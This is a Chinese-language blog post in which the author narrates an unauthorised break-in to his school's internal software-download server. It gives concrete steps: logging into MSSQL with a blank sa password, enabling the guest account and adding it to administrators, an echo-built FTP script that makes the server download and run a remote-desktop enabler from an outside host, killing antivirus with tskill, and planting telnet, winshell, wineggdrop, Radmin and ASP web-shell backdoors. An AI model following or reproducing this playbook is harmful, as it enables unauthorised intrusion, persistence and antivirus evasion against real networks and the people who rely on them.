記一次對學校DHCP服務器的***過程

前言:
我所處的網絡是一個學校內部的校園網, 所有寢室裏的電腦全部靠學校一臺DHCP服務器自動分配IP地址上網. 不知道爲什麼最近一段時間,學校的網絡不太穩定,而且同學的機器安全越來越好.幾乎很難***. 後來知道是學校爲學生開設了一個WEB地址,裏面有防毒軟件下載
出於對技術的追求.對於個各殺毒軟件的測試,可以更好的保護我們的後門程序.
我也上去下載了安裝玩玩.( 網絡衛士).
不安裝還好,一裝,差點沒把我的氣死. 除了能夠殺出幾百年前的那些***工具之外. 一些後程序本根發現不了.老報告.你的機器安全.可以放心使用.暈.什麼軟件啊.
氣歸氣吧.出於本能,突然有種想對這個下載的站進行一次安全性測試,看看能不能***.
因爲是內網的服務器提供的,軟件下載功能.我就沒用內雞.而直接對其***分析.
let 's go

一.準備工具:

1. x-scan掃描器.
2. supersqlexec (mssql連接器)
3.2k3389 (開3389)
4.c3389 (改3389)
5. winshell 後門程序
6.wineggdrop 後門程序
7.Remote Administrator 2.1中文版 (永不被殺)
8.tftpd32小型FTP服務器
9. tskill.exe 殺掉系統防毒軟件進程
二.收集主機信息.

打開x-scan ,在掃描模塊中,選中全部模塊,對其進行全面的信息收集.,然後在掃描參數選項卡中,指定IP範圍裏就填入: 172.16.1.250 就是提供軟件下載的服務器IP地址.
一切設置完成後,就點擊"掃描"接鈕. 不出20分鐘,掃描已經完成.查看了一下掃描信息.
**.眼睛一亮.有個SQL弱口令(sa密碼爲空).我真不敢相信自己的眼睛.這年頭這類東西還存在的啊.
不管了.拿出supersqlexec 填入IP,帳號爲:SA,密碼既然是空,我就不填了. 點擊"連接".
突然彈出"連接成功"對話框. 看來真的存在這個漏洞. 那我們還等什麼,dir查看一下再說了.
發現系統目錄在 c:\winnt\system32.
再用 net start 查看了一下,系統服務.發現裏面安裝了一些常規服務外,還有個防毒軟件(網各衛士) .
再用 net user 查看了一下系統中存在的所有用戶.發現除了管理員帳號跟guest 帳號外,還有個 why 帳號. 和TsInternetUser.(TsInternetUser帳號的存在說明這臺機器是server) 管它呢. 先加個自己的帳號在裏面吧. 但建立新帳號太明顯.怕被發現.
我還是看一下guest帳號吧.在它身上做點文章.
net user guest 發現這個帳號沒被啓用.
那真是太好了.我馬上把它擊活 net user guest /active:yes
然後加了個密碼 net user guest xuesha
接着加爲管理員: net localgroup administrators guest /add
既然有了帳號. 還有對方又是server系統,我馬上用終端連接器,進行連接.mstsc
輸入IP.點擊連接.等了近10秒種,發現連接不上" 中斷遠程桌面"的提示信息.
看來管理員沒用開3389端口哦. 那咱辦.放棄嗎? 這怎麼可能.太不像我的作風了. 既然可以用dos命令. 那我爲何不用用 ftp 功能啊. 把開3389的端口的工具上傳上去.
想到這裏,說做就做.馬上在 supersqlexec 的提示行中,輸入命令,建立一個TXT文件,讓服務器自動下載並運行程序.
過程如下:
echo open [url]www.tmwl.net[/url] >up.txt
echo tmwl >>up.txt
echo XXXX >>up.txt
get 2k3389.exe >>up.txt
bye >>up.txt
爲了正實,這個文件確實建立成功. 我用type up.txt查看了下. 一切OK.這下就有好戲上場了.
在提示行中輸入: ftp -s:up.txt .然後回車.
如果不出意外,幾秒鐘後,就會提示,文件下載成功.
dir 2k3389.exe /s 查找了一下,果然發現文件已經下載成功了.
我想每個人,做到這一步的時候,心情一樣跟我開心.有種說不出的喜樂.
還等什麼啊. 運行 2k3389.exe 程序哦. 等服務器重啓上來後, 一臺3389(內網肉雞產生了).我等啊等. 10分鐘以後,我用mstsc 再次連接. 果然出現登錄終端的提示界面.
一陣驚喜,在用戶名處輸入: guest 剛剛建立的帳號
在密碼處輸入: xuesha 密碼
回車.
一陣不安的等待. 一個模糊的新桌面出現在我的前面.哈哈............各位. 我已經成功進入了


先申明一下. 系統開3389加新建帳號.只是一個後門安制方法. 爲了以後我能完全控制這個服務器.接下來,我給它一連開了4個telnet後門.

第二個後門:
這個後門,我當然是把服務器內部自帶的 telnet 服務給打開. 好讓下次可以在命令提示符下控制.
首先,我們對其 telnet 服務進行配製. 不要把管理員當傻子哦. 這也是爲了更好的讓後門只爲我服務.

1. 運行 tlntadmn.exe 程序.來配製 telnet 服務. 先把 默認的 23 端口改爲: 111
再改登錄認證 NTLM 值.
設置完畢後,我試着 telnet 172.16.1.250 111, ,成功進入.說明這個後門做成功了.


第三個後門:
這個後門.當然是要首選 winshell 了.
爲了更好的把工具上傳到服務器上, 我在本地開了一個小型的 tftp服務.(有的是tftpd32)
沒想到,剛上傳完,就被殺了.5555555555555555555
咱辦.不傳了嗎?NO.
我們把防毒軟件的進程,殺掉就行了. 它還防我們個毛啊. 該是我們防它的時候了.
tftp -i 172.16.1.1 get tskill.exe 馬上把服務器運行這個命令.
把本機的 tskill.exe 工具上傳上去. 殺掉系統防毒軟件進程
哈哈.這回它沒戲了.
還等什麼啊,把winshell服務端上傳上去,並運行哦.

第四個後門:
這個後門,我用的是: wineggdrop 後門程序
這個後門程序有個特點,必須把裏面自帶的一個服務端跟dll文件一起復制到\winnt\system32目錄下,才能正常運行的.
希望大家在使用時候,要注意到這點.

有關wineggdrop 後門程序 的服務器配製與 如何在肉雞上安裝,服務端.這裏就不介紹了.
具體的使用方法,自己研究吧.


第五個後門:
Remote Administrator 2.1中文版 (永不被殺)
這是個遠程控制的. 具體的使用方法,這裏不介紹了.
只要你能上傳到服務器上,一切好辦.


第六個後門;
學校不是開了一個 web 軟件下載服務嘛. 那我就放入一個 fso.asp ***.或者cmd.asp等一些網頁的***.以備不時之需哦.

後門工具的使用方法,我這就不用介紹了.有興趣朋友自己研究吧. 這裏主要是介紹一種***的思路.


技術會過時,學習方法,***思路不會過時.只要你好好分析別人的***思路,結合自己的方法.我想你一定會成爲一個***高手.
我不是什麼***,只是對網絡安全研究有所興趣. 更慘的是我這次期未考試.網絡工程只得了48分.下學期來得回學校補考.真不知道是中國教育界的悲哀.還是學校在誤人子弟.
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章